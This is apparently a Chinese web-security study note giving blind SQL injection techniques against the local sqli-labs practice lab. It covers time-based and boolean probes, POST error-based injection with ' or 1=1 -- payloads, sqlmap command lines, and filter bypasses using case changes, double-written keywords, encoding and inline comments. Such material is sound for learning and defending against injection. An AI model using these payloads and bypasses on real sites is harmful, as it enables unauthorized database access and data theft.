- 1vue3 集成 Element-Plus之全局导入/按需导入_unplugin-element-plus
- 218. 四数之和 - 力扣(LeetCode)
- 3Python 3.11 终于发布了,性能大提升!
- 4matplotlib高级教程之形状与路径——patches和path_matplotlib.patches
- 5本地运行LlaMA 2的简易指南_llama2本地运行
- 6基础——SPI与QSPI的异同,QSPI的具体协议是什么,QSPI有什么用_qspi和spi接口的区别
- 73D建模与处理软件简介
- 8Vue三种3D动态词云实现
- 9Linux搭建Hyperledger Fabric区块链框架 - Hyperledger Fabric模型概念_hyperledger fabric数据上链
- 10初识 Nodejs (附带案例)_nodejs 实例
Web安全攻防的学习——06—(盲注介绍、GET基于时间的盲注、GET基于Boolean的盲注、POST基于错误的注入、POST基于时间的盲注、SQL注入绕过手段)(重点)_post盲注入
赞
踩
1、盲注介绍
Blind SQL(盲注)是注入攻击的其中一种,向数据库发生true或false这样的问题,并根据应用程 序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题
盲注种类
- 1.布尔类型
- 2.时间的盲注
GET基于时间的盲注
if(ascii(substr(database(),1,1))=115,1,sleep(3)) # 如果ascii(substr(database(),1,1))=115执行成功,返回1,否则返回sleep(3)
当数据库名第一个字母的ASCII码等于115时,执行一次sleep(3)函数等待3秒
substr(str,pos,len) # 从pos的位置截取长度为len的str的字符串
ascii(s)=115 # 将字符串转化为数字 是否都等于115
- 1
- 2
- 3
- 4
- 5
1.判断是否存在注入点
http://127.0.0.1/sqli/Less-5/?id=1' if(1=0,sleep(3),1) --+
- 1
2.判断数据库的长度
http://127.0.0.1/sqli/Less-5/?id=1' if(length(database())=8,sleep(3),1) --+
- 1
http://127.0.0.1/sqli/Less-5/?id=1' if(length(database())=9,sleep(3),1) --+
- 1
3.判断数据库的名字
http://127.0.0.1/sqli/Less-5/?id=1' if(ascii(substr(database(),1,1))=115,1,sleep(3)) --+
- 1
GET基于Boolean的盲注
基于布尔的盲注,我们通常采用下面的办法猜解字符串
1、当页面显示为You are in时候,说明写的sql语句是正确的。
http://127.0.0.1/sqli/Less-5/?id=1‘ and length(database())=3 --+
2、判断数据库的名字
http://127.0.0.1/sqli/Less-5/?id=1’ and (select ascii(substr(database(),1,1))=115) --+
数据库第一个字符串为s,ASCII码为115
sqlmap安全测试
python sqlmap.py -u “http://127.0.0.1/sqli/Less-8/?id=1” --technique T --dbs
python sqlmap.py -u “http://127.0.0.1/sqli/Less-8/?id=1” --technique B --dbs
POST基于错误的注入
特点:
- 1.POST请求不能被缓存下来
- 2.POST请求不会保存在浏览器浏览记录中
- 3.以POST请求的URL无法保存为浏览器书签
- 4.POST请求没有长度限制
POST基于错误单引号注入
注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。可以借助对应的插件完 成修改任务
根据之前学习的字符串注入内容,我们推断
报错信息:' 123 ' LIMIT 0,1 '
请求参数为:uname=admin'&passwd=123&submit=Submit 说明错误部分注入点在password
正确的sql语句为:
select * from xxx where uname= 'xxx' and passwd= 'xxx';
注入语句修改为:使得整个where语句结果为True
select * from xxx where uname= 'xxx' or 1=1 -- ' and passwd= 'xxx';
' or 1=1 -- #这是我们需要注入的sql语句部分,人为添加的内容,使之闭合单引号
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
单引号注入完成如下:
POST基于错误双引号注入
注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。可以借助对应的插件完 成修改任务。
根据之前学习的字符串注入内容,我们推断(重点)
报错信息:' 123 " ) LIMIT 0,1 '
请求参数为:uname=admin"&passwd=123&submit=Submit 说明错误部分注入点在password
正确的sql语句为:
select * from xxx where uname= ("xxx") and passwd= 'xxx';
注入语句修改为:使得整个where语句结果为True
select * from xxx where uname= ("xxx") or 1=1 -- ") and passwd= 'xxx';
") or 1=1 -- #这是我们需要注入的sql语句部分,人为添加的内容,使之闭合双引号和括号
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
双引号注入完成如下:
sqlmap安全测试
python sqlmap.py -r target.txt -p passwd --technique E
targer.txt文件中是当前网址的请求,加上发送的参数
–technique E ------- 基于error的探测技术
-p passwd -----------指定探测参数
POST基于时间的盲注
在存在注入点POST提交的参数后加
and (select (if(length(database())>5,sleep(5),null))) –
如果执行的页面响应时间大于5秒,肯定就存在注入,并且对应的SQL语句执行
POST基于布尔的盲注
在存在注入点POST提交的参数后加入if判断语句
and length(database())=8 –
如果能够登陆成功,说明POST基于布尔的盲注成功
select length(database());
select substr(database(),1,1);
select ascii(substr(database(),1,1));
select ascii(substr(database(),1,1)) > N;
select ascii(substr(database(),1,1)) = N;
select ascii(substr(database(),1,1)) < N;
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
2、SQL注入绕过手段
如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如: and 过滤,当然这种过滤只是发现关键字出现,并不会对关键字处理
大小写绕过
通过修改关键字内字母大小写来绕过过滤措施。例如:
AnD 1=1
order by 可以使用 OrdER来进行绕过
双写绕过
如果在程序中设置出现关键字之后替换为空,那么SQL注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。因为在过滤过程中只进行了一次替换。就是将关键字替换为空
uniunionon union替换为空,也可以结合大小写绕过
编码绕过
可以利用URL编码工具,绕过SQL注入的过滤机制
URL编码解码
内联注释绕过
在MySQL中内联注释中的内容可以被当做SQL语句执行
/!select/ * from users;
